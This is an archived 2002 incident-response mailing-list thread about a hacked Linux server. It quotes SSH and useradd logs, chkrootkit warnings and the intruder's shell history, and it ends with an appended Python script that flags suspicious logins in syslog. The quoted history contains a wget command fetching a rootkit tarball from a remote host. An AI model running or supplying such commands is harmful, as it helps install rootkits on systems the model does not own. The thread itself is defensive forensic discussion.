RE: possible ssh hack

From: Alvin Oga (alvin.secat_private-Consulting.com)
Date: Wed Sep 11 2002 - 21:38:26 PDT


    hi ya ver
    
    On Wed, 11 Sep 2002, Ver Allan Sumabat wrote:
    
    > we used linux 2.4.7-10. we only opened ports 21 (ftp),
    > 22 (ssh), and 443 (https). 
    > 
    > 21 - wu-ftpd-2.6.1-20
    > 22 - openssh-3.1
    > 443 - tomcat-3.2.4
    
    what other ports does nmap say are open to the outside
    and to the inside of your corp LAN ??
     
    > 1. this is the content of /home/war's .bash_history:
    > 
    > wget
    > wget http://mrunix.free.fr/roy/w00tkit.tgz
    > logout
    
    game over... they are already in your server ...
    
    	- they probably got in through wu-ftpd and/or openssh
    	  ( check the respective websites for the current
    	    versions you should have been running )
    
    - you should NOT have been running 2.4.7-10 kernels...
    	you should always compile your own kernel
    	and apply your own kernel hardening apps
    
    they were trying to get more rootkits installed ( w00tkit )
    
     
    > 2. he was trying to send a mail to himself regarding
    > the system's resources:
    > 
    > The original message was received at Thu, 5 Sep 2002
    > 22:21:37 +0800
    > from root@localhost
    > 
    >    ----- The following addresses had permanent fatal
    > errors -----
    > roi_blablaat_private
    >     (reason: 501 5.1.8 Sender domain must exist)
    
    seems really really odd that the [h/cr]acker would 
    send themselves an email to a domain that does not exist
    or that rejects it... must be another hacked box they
    are playing with ??
    
    - more server hardening/tightening stuff
    	http://www.Linux-Sec.net
    
    c ya
    alvin
    
    > 
    >    ----- Transcript of session follows -----
    > ... while talking to rmail.walla.co.il.:
    > >>> MAIL From:<rootat_private> SIZE=2283
    > <<< 501 5.1.8 Sender domain must exist
    > 501 5.6.0 Data format error
    > 
    > 3. walla.co.il is in israel
    > 
    > 4. tracing 212.179.207.211 gives israel also.
    > 
    > i have moved the files to another machine and
    > reinstalled the server 'cause we need to put it up and
    > running asap. do you think the exploit was done thru
    > ftp? can you help me replicate it? i was looking for
    > procedures or scripts in ssh/ftp exploits so that i
    > can try to attack our server but i can not find any.
    > 
    > --- Loki <lokiat_private> wrote:
    > > What version of SSHD were you running, check
    > > commonly exploited
    > > services.
    > > 
    > > 1. SSHD (crc32)
    > > 2. FTPD 
    > > 3. Apache (chunking)
    > > 
    > > Get back to us with the versions you were running of
    > > SSH, FTP, and
    > > Apache and we can help you out. How hardened was the
    > > OS? Did you turn
    > > off all RPC services, etc. We need more info.
    > > 
    > > Eric/Loki
    > > Internet Warfare and Intelligence
    > > Fate Research Labs
    > > www.fatelabs.com
    > > 
    > > -----Original Message-----
    > > From: Ver Allan Sumabat [mailto:ver_allanat_private]
    > > 
    > > Sent: Tuesday, September 10, 2002 6:08 AM
    > > To: incidentsat_private
    > > Subject: possible ssh hack
    > > 
    > > 
    > > Hi,
    > > 
    > > We have just recently been hacked. I have no idea
    > > how
    > > he came in. Here are my preliminary investigations:
    > > 
    > > 1. He was able to add a user without logging in.
    > > 
    > > **Unmatched Entries**
    > > Sep  5 10:39:33 srv1 sshd[20514]: Could not reverse
    > > map address 10.13.41.4.
    > > Sep  5 10:39:35 srv1 sshd[20514]: Accepted password
    > > for root from 10.13.41.4
    > > port 4207
    > > Sep  5 17:30:36 srv1 sshd[23299]: Could not reverse
    > > map address 10.13.41.4.
    > > Sep  5 17:30:41 srv1 sshd[23299]: Accepted password
    > > for root from 10.13.41.4
    > > port 2491
    > > Sep  5 22:16:59 srv1 useradd[23532]: new group:
    > > name=war, gid=502
    > > Sep  5 22:16:59 srv1 useradd[23532]: new user:
    > > name=war, uid=502, gid=502,
    > > home=/home/war, shell=/bin/bash
    > > Sep  5 22:17:31 srv1 sshd[23534]: Accepted password
    > > for war from
    > > 212.179.207.211 port 2746
    > > Sep  5 22:19:17 srv1 sshd[23580]: fatal: Read from
    > > socket failed: Connection
    > > reset by peer
    > > Sep  5 22:21:48 srv1 sshd[928]: Received SIGHUP;
    > > restarting.
    > > 
    > > 
    > > 2. He installed a tarball w00tkit.tgz in /home/war
    > > 
    > > 3. After running chkrootkit, the significant lines
    > > are:
    > > 
    > > ...
    > > Checking `ifconfig'... INFECTED
    > > ...
    > > Searching for Showtee... Warning: Possible Showtee
    > > Rootkit installed
    > > ...
    > > Checking `lkm'... You have     1 process hidden for
    > > ps
    > > command
    > > Warning: Possible LKM Trojan installed
    > > 
    > > 4. ssh won't run anymore
    > > 
    > > Can anyone help me on how the intrusion was done?
    > > 
    > > Thanks.
    > > 
    > > Regards,
    > > 
    > > Allan
    > > 
    > > 
    > >
    > > ----------------------------------------------------------------------------
    > > This list is provided by the SecurityFocus ARIS analyzer service. For
    > > more information on this free incident handling, management
    > > and tracking system please see:
    > > http://aris.securityfocus.com
    > > 
    > > 
    > > 
    > 
    > 
    
    
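    Added example, not part of the thread or of anyone's posted code: a small
    Python script that does over the sshd/useradd lines Allan posted what he did
    by hand, so the same check can be run over a full copy of /var/log/messages
    and /var/log/secure pulled off the box. It flags password logins as root,
    a new account that is logged into shortly after useradd creates it (with the
    source marked internal or external using the RFC 1918 ranges, so 10.13.41.4
    counts as internal and 212.179.207.211 as external), and an sshd restart.
    Assumptions: the year is 2002 because syslog timestamps carry none; the
    one-hour creation-to-login window is an arbitrary choice; the sample log
    embedded below is just the lines quoted in the post. Run it against a copy
    of the logs on a clean machine, as Allan did, since a rooted host can have
    its logs and syslogd edited.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Sample input: the sshd/useradd lines quoted in the original post. The
# year (2002) is supplied by us because syslog timestamps omit it.
SAMPLE_LOG = """\
Sep  5 10:39:33 srv1 sshd[20514]: Could not reverse map address 10.13.41.4.
Sep  5 10:39:35 srv1 sshd[20514]: Accepted password for root from 10.13.41.4 port 4207
Sep  5 17:30:36 srv1 sshd[23299]: Could not reverse map address 10.13.41.4.
Sep  5 17:30:41 srv1 sshd[23299]: Accepted password for root from 10.13.41.4 port 2491
Sep  5 22:16:59 srv1 useradd[23532]: new group: name=war, gid=502
Sep  5 22:16:59 srv1 useradd[23532]: new user: name=war, uid=502, gid=502, home=/home/war, shell=/bin/bash
Sep  5 22:17:31 srv1 sshd[23534]: Accepted password for war from 212.179.207.211 port 2746
Sep  5 22:19:17 srv1 sshd[23580]: fatal: Read from socket failed: Connection reset by peer
Sep  5 22:21:48 srv1 sshd[928]: Received SIGHUP; restarting.
"""

# "Mon DD HH:MM:SS host prog[pid]: message" (classic syslog layout)
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ "
    r"(?P<prog>[\w.-]+)\[\d+\]: (?P<msg>.*)$"
)
ACCEPT_RE = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+")
NEWUSER_RE = re.compile(r"new user: name=(?P<user>[^,]+), uid=(?P<uid>\d+)")


def parse_ts(stamp, year=2002):
    """Turn a syslog timestamp into a datetime; the year is an assumption."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def parse_log(text, year=2002):
    """Yield (timestamp, program, message) for every syslog-shaped line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append((parse_ts(m["ts"], year), m["prog"], m["msg"]))
    return events


def analyze(text, window=timedelta(hours=1), year=2002):
    """Correlate useradd and sshd events; return a list of finding dicts."""
    findings = []
    created = {}  # username -> time useradd created it
    for ts, prog, msg in parse_log(text, year):
        if prog == "useradd":
            nu = NEWUSER_RE.search(msg)
            if nu:
                created[nu["user"]] = ts
            continue
        if prog != "sshd":
            continue
        acc = ACCEPT_RE.search(msg)
        if acc:
            user, ip, method = acc["user"], acc["ip"], acc["method"]
            # RFC 1918 test: 10.x.x.x is "internal", 212.x.x.x is not
            external = not ipaddress.ip_address(ip).is_private
            if user == "root" and method == "password":
                findings.append({"kind": "root_password_login", "user": user,
                                 "ip": ip, "external": external, "ts": ts})
            if user in created and timedelta(0) <= ts - created[user] <= window:
                findings.append({"kind": "new_account_login", "user": user,
                                 "ip": ip, "external": external, "ts": ts,
                                 "delay_s": int((ts - created[user]).total_seconds())})
        elif "Received SIGHUP; restarting" in msg:
            # sshd being restarted right after the new account logged in is
            # worth a look: a trojaned sshd has to be restarted to take effect
            findings.append({"kind": "sshd_restart", "ts": ts})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"].strftime("%b %d %H:%M:%S"), f["kind"],
              {k: v for k, v in f.items() if k not in ("kind", "ts")})
```

    On the posted lines this reports two password logins as root from
    10.13.41.4, the "war" account logging in from 212.179.207.211 (external)
    32 seconds after useradd created it, and the sshd restart at 22:21:48.
    Feed it the whole secure/messages log and the window is what separates
    an admin creating an account from an intruder creating one and using it.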
    



    This archive was generated by hypermail 2b30 : Thu Sep 12 2002 - 23:06:00 PDT